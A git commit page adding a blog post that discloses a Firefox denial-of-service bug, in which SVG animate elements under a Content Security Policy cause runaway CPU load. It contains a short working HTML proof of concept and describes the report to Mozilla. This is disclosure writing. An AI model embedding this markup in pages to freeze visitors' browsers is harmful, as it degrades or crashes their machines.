blog

https://blog.ce9e.org
git clone https://git.ce9e.org/blog.git
commit
1f42da613fda39bf117bfea821cbbe7ed5ccb8c5
parent
ff1e3d8a815a451a1ee38e709032730805d45760
Author
Tobias Bengfort <tobias.bengfort@posteo.de>
Date
2023-12-07 07:11
post on CSP DoS in firefox

Diffstat

A _content/posts/2023-12-06-csp-dos/index.md 49 +++++++++++++++++++++++++++++++++++++++++++++++++

1 files changed, 49 insertions, 0 deletions

diff --git a/_content/posts/2023-12-06-csp-dos/index.md b/_content/posts/2023-12-06-csp-dos/index.md 

@@ -0,0 +1,49 @@
   -1     1 ---
   -1     2 title: Denial of Service using Content Security Policies in Firefox
   -1     3 date: 2023-11-04
   -1     4 tags: [code, security]
   -1     5 ---
   -1     6 
   -1     7 Content Security Policies (CSPs) instruct browsers to block all code
   -1     8 that has not explicitly been allowed. This is meant to limit the impact
   -1     9 of script injections.
   -1    10 
   -1    11 I found that using the SVG `<animate>` element in Firefox triggers that
   -1    12 blocking mechanism repeatedly, leading to high CPU load and ultimately
   -1    13 denial of service. The CPU load can be increased simply by adding more
   -1    14 elements. Here is a simple proof of concept:
   -1    15 
   -1    16 ```html
   -1    17 <!DOCTYPE html>
   -1    18 <html>
   -1    19 <head>
   -1    20   <meta charset="utf-8">
   -1    21   <meta http-equiv="Content-Security-Policy" content="style-src 'self'">
   -1    22 </head>
   -1    23 <body>
   -1    24   <svg width="50px" height="50px" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">
   -1    25     <rect x="0" y="0" width="10" height="10">
   -1    26       <animate attributeName="opacity" from="1" to="0" dur="1s" begin="0s" repeatCount="indefinite" />
   -1    27     </rect>
   -1    28   </svg>
   -1    29 </body>
   -1    30 </html>
   -1    31 ```
   -1    32 
   -1    33 I personally run into that problem all the time because I block unsafe inline
   -1    34 styles on all websites by default using my [xiMatrix
   -1    35 extension](https://addons.mozilla.org/en-US/firefox/addon/ximatrix/).
   -1    36 
   -1    37 I reported this issue to security@mozilla.org in August 2022. They responded
   -1    38 within a few days and told me that this issue had already been found a few
   -1    39 years prior and had a [public
   -1    40 ticket](https://bugzilla.mozilla.org/show_bug.cgi?id=1459872). Needless to say,
   -1    41 it has not been fixed yet.
   -1    42 
   -1    43 Chrome doesn't block SVG animations at all. I am not sure whether that is the
   -1    44 optimal approach. But denial of service if definitely not good. If they want to
   -1    45 block an animation, it should be blocked once and not on every frame.
   -1    46 
   -1    47 The irony here is that the exploitable system is one that was designed to
   -1    48 improve security. I want to recommend CSPs and I do, even though I know there
   -1    49 is this bug that is relatively easy to exploit in the wild.